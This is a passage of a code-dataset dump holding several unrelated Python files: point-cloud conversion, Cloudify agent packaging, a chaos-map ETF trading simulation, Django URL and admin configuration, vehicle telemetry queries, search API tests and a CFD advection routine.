tqdm(files):\n if os.path.exists(output_path+file.split('.')[0]+\".txt\"):\n print(\"EXIST\")\n else:\n print(\"DOESN'T\")\n points = read_ply(os.path.join(subdir, file))\n\n #points[:, :3] /= 1000\n #points[:, 3] -= np.min(points[:, 3])\n #points[:, 3] /= np.max(points[:, 3])\n\n #rot_x = -np.pi / 2\n #Rx = np.array([[1, 0, 0],\n # [0, np.cos(rot_x), -np.sin(rot_x)],\n # [0, np.sin(rot_x), np.cos(rot_x)]])\n\n #rot_z = -np.pi / 2\n #Rz = np.array([[np.cos(rot_z), -np.sin(rot_z), 0],\n # [np.sin(rot_z), np.cos(rot_z), 0],\n # [0, 0, 1]])\n\n #R = Rz @ Rx\n\n ## add a -1.1 in that position if you want to lower the height of the point cloud (z coordinate), not\n ## necessary\n ## H = np.row_stack((np.column_stack((R, [0, 0, -1.1])), [0, 0, 0, 1]))\n\n #H = np.row_stack((np.column_stack((R, [0, 0, 0])), [0, 0, 0, 1]))\n filename = file.split('.ply')[0]\n for idx, point in tqdm(enumerate(points)):\n #new_point = H @ np.array([*point[:3], 1])\n #new_point = new_point[:3] / new_point[3]\n \n points[idx][:3] = point[:3]\n\n with open(output_path+filename+'.txt', 'a') as f:\n f.write(\"{} {} {}\".format(points[idx][0],points[idx][1],points[idx][2])+'\\n')\n print(\"END\")","sub_path":"utils/prepare_ply.py","file_name":"prepare_ply.py","file_ext":"py","file_size_in_byte":2690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"175700967","text":"#########\n# Copyright (c) 2013 GigaSpaces Technologies Ltd. 
All rights reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# * See the License for the specific language governing permissions and\n# * limitations under the License.\n\nimport os\nimport platform\n\nfrom agent_packager import packager\nfrom cloudify import ctx\nfrom cloudify_agent.tests.resources import get_resource\nfrom cloudify.utils import LocalCommandRunner\nfrom cloudify.exceptions import NonRecoverableError\n\n\nconfig = {\n 'cloudify_agent_module': ctx.node.properties['cloudify_agent_module'],\n 'requirements_file': ctx.node.properties.get('requirements_file')\n}\n\nresource_base = ctx.node.properties['resource_base']\nfile_server_port = ctx.node.properties['file_server_port']\n\n\n# This should be integrated into packager\n# For now, this is the best place\ndef create_windows_installer():\n runner = LocalCommandRunner()\n wheelhouse = get_resource('winpackage/source/wheels')\n\n pip_cmd = 'pip wheel --wheel-dir {wheel_dir} --requirement {req_file}'.\\\n format(wheel_dir=wheelhouse, req_file=config['requirements_file'])\n\n ctx.logger.info('Building wheels into: {0}'.format(wheelhouse))\n runner.run(pip_cmd)\n\n pip_cmd = 'pip wheel --find-links {wheel_dir} --wheel-dir {wheel_dir} ' \\\n '{repo_url}'.format(wheel_dir=wheelhouse,\n repo_url=config['cloudify_agent_module'])\n runner.run(pip_cmd)\n\n iscc_cmd = 'C:\\\\Program Files (x86)\\\\Inno Setup 5\\\\iscc.exe {0}'\\\n .format(get_resource(os.path.join('winpackage', 'create.iss')))\n os.environ['VERSION'] = '0'\n os.environ['iscc_output'] = os.getcwd()\n runner.run(iscc_cmd)\n\nctx.logger.info('Changing directory into {0}'.format(resource_base))\noriginal = os.getcwd()\ntry:\n ctx.logger.info('Creating Agent Package')\n os.chdir(resource_base)\n if platform.system() == 'Linux':\n packager.create(config=config,\n config_file=None,\n force=False,\n verbose=False)\n distname, _, distid = platform.dist()\n package_url = 'http://localhost:{0}/{1}-{2}-agent.tar.gz' \\\n .format(file_server_port, distname, distid)\n elif platform.system() == 'Windows':\n create_windows_installer()\n package_url = 'http://localhost:{0}/cloudify_agent_0.exe' \\\n .format(file_server_port)\n else:\n raise NonRecoverableError('Platform not supported: {0}'\n .format(platform.system()))\nfinally:\n os.chdir(original)\n\nctx.logger.info('Package created successfully: {0}'.format(package_url))\nctx.logger.info('Setting runtime properties')\nctx.instance.runtime_properties['package_url'] = package_url\n","sub_path":"cloudify_agent/tests/resources/blueprints/agent-from-package/scripts/create-package.py","file_name":"create-package.py","file_ext":"py","file_size_in_byte":3147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"174244912","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport csv\n\ndef compute_yorke(c, r_c,hist_c):\n\tc[0] = c[0]*r_c[0]*(1.-c[0])\n\thist_c[0].append(c[0])\n\tc[1] = c[1]*r_c[1]*(1.-c[1])\n\thist_c[1].append(c[1])\n\tc[2] = c[2]*r_c[2]*(1.-c[2])\n\thist_c[2].append(c[2])\n\ndef compute_may_feigenbaum(c, r_c,hist_c):\n\tc_pow = np.power(c,2.)\n\tc[0] = 
r_c[0]*(c[0]-c_pow[0])\n\thist_c[0].append(c[0])\n\tc[1] = r_c[1]*(c[1]-c_pow[1])\n\thist_c[1].append(c[1])\n\tc[2] = r_c[2]*(c[2]-c_pow[2])\n\thist_c[2].append(c[2])\n\ndef compute_feigenbaum(c, r_c,hist_c):\n\tc[0] = r_c[0]*np.sin(np.pi*c[0])\n\thist_c[0].append(c[0])\n\tc[1] = r_c[1]*np.sin(np.pi*c[1])\n\thist_c[1].append(c[1])\n\tc[2] = r_c[2]*np.sin(np.pi*c[2])\n\thist_c[2].append(c[2])\n\n\t\ndef print_sim_report(sum, r_c,shares,cash,price):\n\tprint('total investment:'+str(sum))\n\tprint('r_hold:'+str(r_c[0]))\n\tprint('r_buy:'+str(r_c[1]))\n\tprint('r_sell:'+str(r_c[2]))\n\tprint('num of shares:'+str(shares))\n\tprint('available cash:'+str(cash))\n\tprint('total:'+str((shares*price+cash)))\n\ndef plot(data,hist_c,r_c,hist_cash,hist_shares,num_hold,num_buy,num_sell):\n\tplt.figure(1)\n\tx = range(len(data))\n\tplt.subplot(3,3,1)\n\tline1, = plt.plot(x[0:40],hist_c[0][0:40],'r',label='hist hold')\n\tplt.legend([line1], ['hist hold, r='+str(r_c[0])])\n\tplt.subplot(3,3,2)\n\tline2, = plt.plot(x[0:40],hist_c[1][0:40],'g',label='hist buy')\n\tplt.legend([line2], [ 'hist buy, r='+str(r_c[1])])\n\tplt.subplot(3,3,3)\n\tline3, = plt.plot(x[0:40],hist_c[2][0:40],'b',label='hist sell')\n\tplt.legend([line3], ['hist sell, r='+str(r_c[2])])\n\tplt.subplot(3,3,4)\n\tline4, = plt.plot(x,hist_cash,'g',label='cash')\n\tplt.legend([line4], ['cash'])\n\tplt.subplot(3,3,5)\n\tline5, = plt.plot(x,hist_shares,'r',label='shares')\n\tplt.legend([line5], ['shares'])\n\tplt.subplot(3,3,6)\n\tline6, = plt.plot(x,data,'y',label='spy')\n\tplt.legend([line6], ['spy'])\n\tplt.subplot(3,3,7)\n\tline7 = plt.bar([1,2,3],[num_hold,num_buy,num_sell],label='hold,buy,sell operations')\n\tplt.legend([line7], ['hold,buy,sell operations'])\n\tplt.show()\n\ndef read_etf(etf_name):\n\tdata = []\n\tdates = []\n\tnum_rows = 0\n\t#nacitame data\n\twith open(etf_name,'r') as csvfile:\n\t\tspamreader = csv.reader(csvfile,delimiter=',')\n\t\tfor row in spamreader:\n\t\t\tnum_rows+=1\n\t\t\t#if int(row[0]) > 1483228800:\n\t\t\tdata.append(float(row[1]))\n\t\t\tdates.append(str(row[0]))\n\t\n\treturn data,num_rows, dates\n\t\ndef compute_choice(choice_min=0.,choice_max=1.,isConstant=False):\n\tif(isConstant):\n\t\treturn choice_max\n\t\n\treturn np.random.uniform(choice_min,choice_max)\n\t\ndef main():\n\t#ticket = 'btc_data'\n\tticket = 'SPY'\n\t\n\tdata,l,dates = read_etf('c:\\\\downloaded_data\\\\USD\\\\'+ticket+'.csv')\n\t\t\t\n\t#zakladne vlastnosti hold, buy, sell\t\n\tc = [0.01,0.01,0.01]\t\t\n\t#grow factor pre hold, buy, sell\n\t#best spy\n\t#r_c = [3.7248023104723726, 3.7434059826819586, 3.6937761867181664]\n\tr_c=[3.792741215699916, 3.961690242868475, 3.69609636766504]\n\t#best spy single investment\n\t#r_c=[0.007496274346508,3.758124406721808,3.604305873682242]\n\t#r_c=[3.781934538211035, 3.867263993546563, 3.6020015059038997]\n\t#best ewa\n\t#r_c=[3.673787568009235,3.6054382787045705,3.7991922674927654]\n\t#best ews\n\t#r_c=[3.8220189381860346,3.9584157485372193,3.622339608548732]\n\t#semi-best btc\n\t#r_c = [1044.0665024044329,3.8342336595366913,3.718616826123904]\n\t#semi-etfgrowth-full\n\t#r_c = [3.6881401636784386, 3.9533624620185392, 3.675141142971656]\n\t#last etfgrowth full goodd\n\t#r_c=[2.7132956491891904,3.7724358341968154, 4.050632771766222]\t\n\t#r_c = [3.9615792089203103, 3.9814282553862337, 3.513512900295451]\n\t\n\t#zakladny cash\n\tcash = 300.\n\t#referecna suma\n\tsum = cash\n\n\t#pociatocny pocet share spy\n\tshares = 0\n\n\t#inicializacia historie vlastnosti, shares, cash a poctu operacii\n\thist_c 
= [[] for i in range(len(data))]\n\thist_shares = []\n\thist_cash = []\n\tnum_hold = 0\n\tnum_buy=0\n\tnum_sell=0\n\n\tactions = []\n\t\n\tfor i in range(20):\n\t\t#inicializuj growth factor\n\t\tcompute_yorke(c,r_c,hist_c)\n\t\t#compute_may_feigenbaum(c,r_c,hist_c)\n\t\t#compute_feigenbaum(c,r_c,hist_c)\n\t\n\tprint('total number of rows:'+str(l))\n\tprint('num of data:'+str(len(data)))\n\tfor preheat in range(l - len(data)):\n\t\tcompute_yorke(c,r_c,hist_c)\n\t\n\t\n\t#zakladny loop pre jeden vyber parametrov\n\tfor i in range(len(data)):\n\t\tprice = data[i]\n\t\t#uloz do historie shares a hodnotu aktiv\n\t\thist_shares.append(shares)\n\t\thist_cash.append(cash+price*shares)\n\n\t\t#vypocitaj growth factor\n\t\tcompute_yorke(c,r_c,hist_c)\n\t\t#compute_may_feigenbaum(c,r_c,hist_c)\n\t\t#compute_feigenbaum(c,r_c,hist_c)\n\t\t\n\t\t#kazdy mesiac (30dni) investujeme 300\n\t\tif(i % 30 == 0):\n\t\t\tcash+=300.\n\t\t\tsum+=300.\n\t\t\n\t\t#nahodny vyber\n\t\tchoice = compute_choice(choice_max=0.9, isConstant=True)\n\t\taction_performed = False\n\t\t#hold akcia\n\t\tif(c[0] > choice):\n\t\t\tnum_hold+=1\n\t\t\taction_performed = True\n\t\t\tactions.append([dates[i],c[0],c[1],c[2],price/1000.,'H', price*shares+cash,shares])\n\t\t\tcontinue\n\t\t#buy akcia\n\t\tif(c[1] > choice):\n\t\t\tnum_buy+=1\n\t\t\tnum_shares = cash/price\n\t\t\tcash -= price*num_shares\n\t\t\tshares += num_shares\n\t\t\taction_performed = True\n\t\t\tif num_shares > 0:\n\t\t\t\tactions.append([dates[i],c[0],c[1],c[2],price/1000.,'B', price*shares+cash,shares])\n\t\t\telse:\n\t\t\t\tactions.append([dates[i],c[0],c[1],c[2],price/1000.,'H', price*shares+cash,shares])\n\t\t#sell akcia\n\t\tif(c[2] > choice):\n\t\t\tnum_sell+=1\n\t\t\tcash += price*shares\n\t\t\tif shares > 0:\n\t\t\t\tactions.append([dates[i],c[0],c[1],c[2],price/1000.,'S', cash,0])\n\t\t\telse:\n\t\t\t\tactions.append([dates[i],c[0],c[1],c[2],price/1000.,'H', price*shares+cash,shares])\n\t\t\tshares=0\n\t\t\taction_performed = True\n\t\t\n\t\t#no-action = hold action\n\t\tif(not action_performed):\n\t\t\tnum_hold+=1\n\t\t\tactions.append([dates[i],c[0],c[1],c[2],price/1000.,'H', price*shares+cash,shares])\n\t\t\t\n\t#ak je max vacsi nez limit, skonci\n\tprint_sim_report(sum, r_c,shares,cash,data[len(data)-1])\n\tplot(data,hist_c,r_c,hist_cash,hist_shares,num_hold,num_buy,num_sell)\n\t\n\twith open(ticket+'_training_data.csv','w',newline='') as csvfile:\n\t\twriter = csv.writer(csvfile,delimiter=',')\n\t\tfor action in actions:\n\t\t\twriter.writerow(action)\n\t\n\t\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"py_code/etf_growth_sample_gen.py","file_name":"etf_growth_sample_gen.py","file_ext":"py","file_size_in_byte":5991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"491010618","text":"from django.conf.urls import patterns, url\nfrom .views import prov_list, prov_detail, prov_create, prov_edit, home, master_create, all_json_countries\n\nurlpatterns = patterns('',\n\turl(r'^home/$', home, name='home'),\n url(r'^prov_list/$', prov_list, name='prov_list'),\n url(r'^prov_detail/(?P\\d+)/$', prov_detail, name='prov_detail'),\n url(r'^prov_create/$', prov_create, name='prov_create'),\n url(r'^prov_edit/(?P\\d+)/$', prov_edit, name='prov_edit'),\n url(r'^master_create/$', master_create, name='master_create'),\n\n # This url is used by ajax to create the location's dependent drop down menu.\n url(r'^continent/(?P[^%20]*[-\\w]+)/all_json_countries/$', all_json_countries, 
name='all_json_countries'),\n)\n","sub_path":"proverbs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"329481066","text":"from django.contrib import admin\nfrom app.models import Trip\nfrom app.models import Reservation\nfrom app.models import Client\n\n\n@admin.register(Client)\nclass ClientAdmin(admin.ModelAdmin):\n list_display = (\n 'id',\n 'name',\n 'email',\n 'is_driver',\n )\n\n\n@admin.register(Trip)\nclass TripAdmin(admin.ModelAdmin):\n list_display = (\n 'travel_date',\n 'quotas',\n 'driver',\n 'city_from',\n 'city_to',\n 'price',\n )\n\n\n@admin.register(Reservation)\nclass ReservationAdmin(admin.ModelAdmin):\n list_display = (\n 'trip',\n 'user',\n 'requested_quotas',\n )\n\n\n\n","sub_path":"app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"329413823","text":"from smartway.api.python.exceptions import ErrorGeneral\nfrom smartway.configs.variables import TablaPrincipal\nfrom models import (\n Dato, \n DatoPosicion, \n VariableGeneral, \n ConfigVariable,\n ConfigAlarma,\n)\n\n#########################################################################\n# MOVER A DONDE VAYAN LAS VARIABLES GENERALES\n#########################################################################\nfrom smartway.api.python import obtenerVariablesSoportadasVehiculo\n\n\ndef obtener_variables_soportadas(vehiculo, diccionarioPlano=False):\n '''\n Retorna una lista con las variables soportadas por el vehiculo\n '''\n # Configuracion de variables especiales\n return obtenerVariablesSoportadasVehiculo(vehiculo, diccionarioPlano)\n\n\n#########################################################################\n# FIN\n#########################################################################\ndef crear_configuraciones_privadas(vehiculo):\n '''\n Se generan todas las configuraciones de variables por defecto que hay que\n poner para inicializar en un vehiculo\n '''\n # Configuracion de variables especiales\n for var in VariableGeneral.objects.filter(publica=False):\n cfg = ConfigVariable.get_or_create(variable=var, vehiculo=vehiculo)\n cfg.tracking = False\n cfg.activa = True\n cfg.save()\n ConfigAlarma.get_or_create(configuracion=cfg)\n\n\ndef obtener_datos_vehiculo(vehiculo, idVariable, desde, hasta, errores=False):\n '''\n Se generan todas las configuraciones de variables por defecto que hay que\n poner para inicializar en un vehiculo\n '''\n retorno = None\n if errores:\n # Retorna variables con codigos de error\n retorno = Dato.objects.filter(vehiculo=vehiculo, variable__id=idVariable,\n timestamp__gte=desde, timestamp__lte=hasta).order_by('timestamp')\n else:\n # Retorna variables solo ok\n retorno = Dato.objects.filter(vehiculo=vehiculo, variable__id=idVariable,\n timestamp__gte=desde, timestamp__lte=hasta,\n codigo_error=0).order_by('timestamp')\n\n\n return retorno\n\ndef obtener_posiciones_vehiculo(vehiculo, desde, hasta):\n retorno = None\n \n # Retorna variables con codigos de error\n retorno = DatoPosicion.objects.filter(vehiculo=vehiculo, \n timestamp__gte=desde, timestamp__lte=hasta).order_by(\"timestamp\")\n\n return retorno\n\n\n\ndef obtener_datos_variables(vehiculo, desde, hasta, variables):\n retorno = {}\n lista_variables = TablaPrincipal().obtenerListaTablaPrincipal()\n variables_soportadas = obtener_variables_soportadas(vehiculo, True)\n 
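# For each requested display name, the loop below intersects that name's\n    # candidate variable ids with the ids this vehicle actually reports, and\n    # queries history for the first matching id only (other matches are ignored).\n    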
keys_lista_variables = lista_variables.keys()\n\n for var in variables:\n # Si la variable esta en el sistema\n if var in keys_lista_variables:\n interseccion = list(set(lista_variables[var].ids_variables).intersection(set(variables_soportadas)))\n if interseccion:\n retorno[var] = obtener_datos_vehiculo(vehiculo, interseccion[0], desde, hasta)\n retorno[var + \"_min\"] = lista_variables[var].minimo\n retorno[var + \"_max\"] = lista_variables[var].maximo\n retorno[var + \"_vt\"] = lista_variables[var].tiempo_validez\n\n else:\n retorno[var] = []\n\n if (\"Latitud\" in retorno.keys() and not len(retorno['Latitud'])) \\\n or (\"Longitud\" in retorno.keys() and not len(retorno['Longitud'])):\n\n# print \"NO Lat o leng \", vehiculo\n \n if \"Latitud\" in retorno.keys():\n retorno.pop(\"Latitud\")\n if \"Longitud\" in retorno.keys():\n retorno.pop(\"Longitud\")\n\n retorno[\"Posicion\"] = obtener_posiciones_vehiculo(vehiculo, desde, hasta)\n retorno[\"Posicion_min\"] = ''\n retorno[\"Posicion_max\"] = ''\n retorno[\"Posicion_vt\"] = lista_variables[\"Posicion\"].tiempo_validez\n #print vehiculo\n #try:\n # retorno[\"Posicion\"] = obtener_posiciones_vehiculo(vehiculo, desde, hasta)\n # print \"x\"\n #except Exception:\n # pass\n #retorno[\"Posicion\"] = obtener_posiciones_vehiculo(vehiculo, desde, hasta)\n #\n #prendido = Dato.objects.filter(vehiculo=vehiculo, variable__id=1, timestamp__gte=desde, timestamp__lte=hasta, codigo_error=0).order_by('timestamp')\n #\n #apagado = []\n #for on in prendido:\n # #print on.timestamp , on.valor\n # if on.valor == \"0\":\n # apagado.append(on.timestamp)\n #con_apagados = 0\n #for dato in retorno[\"Posicion\"]:\n # if dato.timestamp in apagado:\n # #print dato.timestamp , dato , \"-------APAGADO\"\n # con_apagados += 1\n # #else:\n # # print dato.timestamp , dato\n #\n #flujo = Dato.objects.filter(vehiculo=vehiculo, variable__id=815, timestamp__gte=desde, timestamp__lte=hasta, codigo_error=0).order_by('timestamp')\n #print\n #no_flujo = 0\n #for flu in flujo:\n # if flu.valor < '10':\n # no_flujo += 1\n #\n #print len(flujo) , \" +++++ \",no_flujo\n #\n #print len(prendido)\n #print \"apagados \" , con_apagados\n #print \"matricula \" , vehiculo.matricula\n #print \"smartway \" , len(retorno[\"Posicion\"])\n #try:\n # print len(retorno[\"Latitud\"]), len(retorno[\"Longitud\"])\n #except Exception:\n # print \"no hay lat y long\"\n #print \"--------------------------\"\n return retorno\n","sub_path":"smartway/ui/data/public.py","file_name":"public.py","file_ext":"py","file_size_in_byte":5489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"88883526","text":"import json\n\nfrom nose.tools import eq_\n\nfrom kitsune.forums.tests import post, thread\nfrom kitsune.questions.tests import question\nfrom kitsune.search.tests.test_es import ElasticTestCase\nfrom kitsune.sumo.urlresolvers import reverse\nfrom kitsune.wiki.tests import document, revision\n\n\nclass SearchApiTests(ElasticTestCase):\n\n def test_wiki_search(self):\n \"\"\"Test searching for wiki documents.\"\"\"\n doc = document(\n title=u'help plz',\n category=10,\n save=True,\n )\n revision(document=doc, is_approved=True, save=True)\n\n doc = document(\n title=u'I can get no firefox',\n category=10,\n save=True,\n )\n revision(document=doc, is_approved=True, save=True)\n\n doc = document(\n title=u'firefox help',\n category=10,\n save=True,\n )\n revision(document=doc, is_approved=True, save=True)\n\n self.refresh()\n\n url = 
reverse('coolsearch.search_wiki')\n\n # All results.\n response = self.client.get(url, {})\n eq_(200, response.status_code)\n\n content = json.loads(response.content)\n eq_(content['num_results'], 3)\n\n # Testing query filter.\n response = self.client.get(url, {\n 'query': 'help',\n })\n eq_(200, response.status_code)\n\n content = json.loads(response.content)\n eq_(content['num_results'], 2)\n\n response = self.client.get(url, {\n 'query': 'firefox',\n })\n eq_(200, response.status_code)\n\n content = json.loads(response.content)\n eq_(content['num_results'], 2)\n\n def test_forum_search(self):\n \"\"\"Test searching for forum threads.\"\"\"\n thread1 = thread(title=u'crash', save=True)\n post(thread=thread1, save=True)\n\n self.refresh()\n\n response = self.client.get(reverse('coolsearch.search_forum'), {\n 'query': 'crash',\n })\n\n eq_(200, response.status_code)\n\n content = json.loads(response.content)\n eq_(content['num_results'], 1)\n\n def test_question_search(self):\n \"\"\"Tests searching for questions.\"\"\"\n ques = question(title=u'audio', save=True)\n ques.tags.add(u'Windows 7')\n\n self.refresh()\n\n response = self.client.get(reverse('coolsearch.search_question'), {\n 'query': 'audio',\n })\n\n eq_(200, response.status_code)\n\n content = json.loads(response.content)\n eq_(content['num_results'], 1)\n","sub_path":"kitsune/coolsearch/tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"521302592","text":"\"\"\"\nComputes advection fluxes for a given variable, with various advection schemes.\n\nFollowing schemes are supported: \"upwind\", \"minmod\", \"koren\" and \"superbee\"\n\"\"\"\n\n# Standard Python modules\nfrom pyns.standard import *\n\n# PyNS modules\nfrom pyns.constants import *\nfrom pyns.operators import *\n\n# =============================================================================\ndef advection(rho, phi, uvwf, dxyz, dt, lim_name):\n# -----------------------------------------------------------------------------\n \"\"\"\n Args:\n rho: Three-dimensional matrix holding physical property in advection\n term (density or density times capacity ...) 
for cells.\n phi: Unknown transported by advection (from \"create_unknown\").\n uvwf: Tuple with three staggered velocity components (where each\n component is created with \"create_unknown\" function.\n dxyz: Tuple holding cell dimensions in \"x\", \"y\" and \"z\" directions.\n Each cell dimension is a three-dimensional matrix.\n dt: Time step.\n lim_name: Limiter name.\n Can be: \"upwind\", \"minmod\", \"koren\" and \"superbee\"\n\n Returns:\n Three-dimensional matrix with advection term.\n \"\"\"\n\n res = phi.val.shape\n nx, ny, nz = res\n\n # Unpack tuples\n uf, vf, wf = uvwf\n dx, dy, dz = dxyz\n\n pos = phi.pos\n\n # Pre-compute geometrical quantities\n sx = dy * dz\n sy = dx * dz\n sz = dx * dy\n\n # ------------------------------------------------\n # Specific for cell-centered transported variable\n # ------------------------------------------------\n if pos == C:\n\n # Facial values of physical properties including boundary cells\n rho_x_fac = cat_x((rho[:1,:,:], avg_x(rho), rho[-1:,:,:])) \n rho_y_fac = cat_y((rho[:,:1,:], avg_y(rho), rho[:,-1:,:])) \n rho_z_fac = cat_z((rho[:,:,:1], avg_z(rho), rho[:,:,-1:])) \n\n # Facial values of areas including boundary cells\n a_x_fac = cat_x((sx[:1,:,:], avg_x(sx), sx[-1:,:,:]))\n a_y_fac = cat_y((sy[:,:1,:], avg_y(sy), sy[:,-1:,:]))\n a_z_fac = cat_z((sz[:,:,:1], avg_z(sz), sz[:,:,-1:]))\n\n # Distance between cell centers, defined at faces including boundaries\n # MODIFY FOR PERIODIC!!!\n del_x = cat_x((dx[:1,:,:]*0.5, avg_x(dx), dx[-1:,:,:]*0.5))\n del_y = cat_y((dy[:,:1,:]*0.5, avg_y(dy), dy[:,-1:,:]*0.5))\n del_z = cat_z((dz[:,:,:1]*0.5, avg_z(dz), dz[:,:,-1:]*0.5))\n\n # Velocities defined at faces including boundaries\n # TAKE CARE YOU HAVE FRESH VALUES FOR PERIODIC\n u_fac = cat_x((uf.bnd[W].val, uf.val, uf.bnd[E].val))\n v_fac = cat_y((vf.bnd[S].val, vf.val, vf.bnd[N].val))\n w_fac = cat_z((wf.bnd[B].val, wf.val, wf.bnd[T].val))\n \n # -----------------------------------------------------------\n # Specific for transported variable staggered in x direction\n # -----------------------------------------------------------\n if pos == X:\n\n # Facial values of physical properties including boundary cells\n rho_x_fac = rho \n rho_nod_y = avg_x(avg_y(rho)) \n rho_y_fac = cat_y((rho_nod_y[:, :1,:], rho_nod_y, rho_nod_y[:,-1:,:])) \n rho_nod_z = avg_x(avg_z(rho)) \n rho_z_fac = cat_z((rho_nod_z[:,:, :1], rho_nod_z, rho_nod_z[:,:,-1:])) \n\n # Facial values of areas including boundary cells\n a_x_fac = sx\n a_y_fac = cat_y((avg_x(sy[:,:1,:]),\n avg_x(avg_y(sy)),\n avg_x(sy[:,-1:,:])))\n a_z_fac = cat_z((avg_x(sz[:,:,:1]),\n avg_x(avg_z(sz)),\n avg_x(sz[:,:,-1:])))\n\n # Distance between cell centers, defined at faces including boundaries\n # MODIFY FOR PERIODIC\n del_x = dx[:,:,:]\n del_y = avg_x(cat_y((dy[:,:1,:]*0.5, avg_y(dy), dy[:,-1:,:]*0.5)))\n del_z = avg_x(cat_z((dz[:,:,:1]*0.5, avg_z(dz), dz[:,:,-1:]*0.5)))\n\n # Velocities defined at faces including boundaries\n # TAKE CARE YOU HAVE FRESH VALUES FOR PERIODIC\n u_fac = cat_x((uf.bnd[W].val, avg_x(uf.val), uf.bnd[E].val)) \n v_fac = avg_x(cat_y((vf.bnd[S].val, vf.val, vf.bnd[N].val)))\n w_fac = avg_x(cat_z((wf.bnd[B].val, wf.val, wf.bnd[T].val))) \n\n # -----------------------------------------------------------\n # Specific for transported variable staggered in y direction\n # -----------------------------------------------------------\n if pos == Y:\n\n # Facial values of physical properties including boundary cells\n rho_nod_x = avg_y(avg_x(rho) )\n rho_x_fac = 
cat_x((rho_nod_x[ :1,:,:], rho_nod_x, rho_nod_x[-1:,:,:]))\n rho_y_fac = rho\n rho_nod_z = avg_y(avg_z(rho) )\n rho_z_fac = cat_z((rho_nod_z[:,:, :1], rho_nod_z, rho_nod_z[:,:,-1:]))\n\n # Facial values of areas including boundary cells\n a_x_fac = cat_x((avg_y(sx[:1,:,:]),\n avg_y(avg_x(sx)),\n avg_y(sx[-1:,:,:])))\n a_y_fac = sy\n a_z_fac = cat_z((avg_y(sz[:,:,:1]),\n avg_y(avg_z(sz)),\n avg_y(sz[:,:,-1:])))\n\n # Distance between cell centers, defined at faces including boundaries\n # MODIFY FOR PERIODIC\n del_x = avg_y(cat_x((dx[:1,:,:]*0.5, avg_x(dx), dx[-1:,:,:]*0.5)))\n del_y = dy[:,:,:]\n del_z = avg_y(cat_z((dz[:,:,:1]*0.5, avg_z(dz), dz[:,:,-1:]*0.5)))\n\n # Velocities defined at faces including boundaries\n # TAKE CARE YOU HAVE FRESH VALUES FOR PERIODIC\n u_fac = avg_y(cat_x((uf.bnd[W].val, uf.val, uf.bnd[E].val)))\n v_fac = cat_y((vf.bnd[S].val, avg_y(vf.val), vf.bnd[N].val)) \n w_fac = avg_y(cat_z((wf.bnd[B].val, wf.val, wf.bnd[T].val)))\n \n # -----------------------------------------------------------\n # Specific for transported variable staggered in z direction\n # -----------------------------------------------------------\n if pos == Z:\n\n # Facial values of physical properties including boundary cells\n rho_nod_x = avg_z(avg_x(rho) )\n rho_x_fac = cat_x((rho_nod_x[ :1,:,:], rho_nod_x, rho_nod_x[-1:,:,:]))\n rho_nod_y = avg_z(avg_y(rho) )\n rho_y_fac = cat_y((rho_nod_y[:, :1,:], rho_nod_y, rho_nod_y[:,-1:,:]))\n rho_z_fac = rho # nx, ny, nz\n\n # Facial values of areas including boundary cells\n a_x_fac = cat_x((avg_z(sx[:1,:,:]),\n avg_z(avg_x(sx)),\n avg_z(sx[-1:,:,:])))\n a_y_fac = cat_y((avg_z(sy[:,:1,:]),\n avg_z(avg_y(sy)),\n avg_z(sy[:,-1:,:])))\n a_z_fac = sz\n\n # Facial values of distance between cell centers\n # MODIFY FOR PERIODIC\n del_x = avg_z(cat_x((dx[:1,:,:]*0.5, avg_x(dx), dx[-1:,:,:]*0.5)))\n del_y = avg_z(cat_y((dy[:,:1,:]*0.5, avg_y(dy), dy[:,-1:,:]*0.5)))\n del_z = dz[:,:,:]\n\n # Facial values of velocities without boundary values\n # TAKE CARE YOU HAVE FRESH VALUES FOR PERIODIC\n u_fac = avg_z(cat_x((uf.bnd[W].val, uf.val, uf.bnd[E].val))) \n v_fac = avg_z(cat_y((vf.bnd[S].val, vf.val, vf.bnd[N].val)))\n w_fac = cat_z((wf.bnd[B].val, avg_z(wf.val), wf.bnd[T].val)) \n\n # -----------------------------\n # Common part of the algorithm\n # -----------------------------\n\n # ------------------------------------------------------------------\n #\n # |-W-|-W-|-o-|-o-|-o-|-o-|-o-|-o-|-o-|-o-|-o-|-o-|-E-|-E-|\n # 0 1 2 3 4 5 6 7 8 9 10 11 12 13 phi\n # x---x---x---x---x---x---x---x---x---x---x---x---x\n # 0 1 2 3 4 5 6 7 8 9 10 11 12 d_x\n #\n # x---x---x---x---x---x---x---x---x---x---x\n # 0 1 2 3 4 5 6 7 8 9 10 r_x\n #\n # ------------------------------------------------------------------\n\n # Compute consecutive differences (and avoid division by zero)\n # FILL THE BUFFERS PROPERLY FOR PERIODIC\n d_x = dif_x(cat_x((phi.bnd[W].val, \n phi.bnd[W].val, \n phi.val, \n phi.bnd[E].val,\n phi.bnd[E].val))) \n d_x[(d_x > -TINY) & (d_x <= 0.0)] = -TINY\n d_x[(d_x >= 0.0) & (d_x < +TINY)] = +TINY\n\n d_y = dif_y(cat_y((phi.bnd[S].val, \n phi.bnd[S].val, \n phi.val, \n phi.bnd[N].val,\n phi.bnd[N].val))) \n d_y[(d_y > -TINY) & (d_y <= 0.0)] = -TINY\n d_y[(d_y >= 0.0) & (d_y < +TINY)] = +TINY\n\n d_z = dif_z(cat_z((phi.bnd[B].val, \n 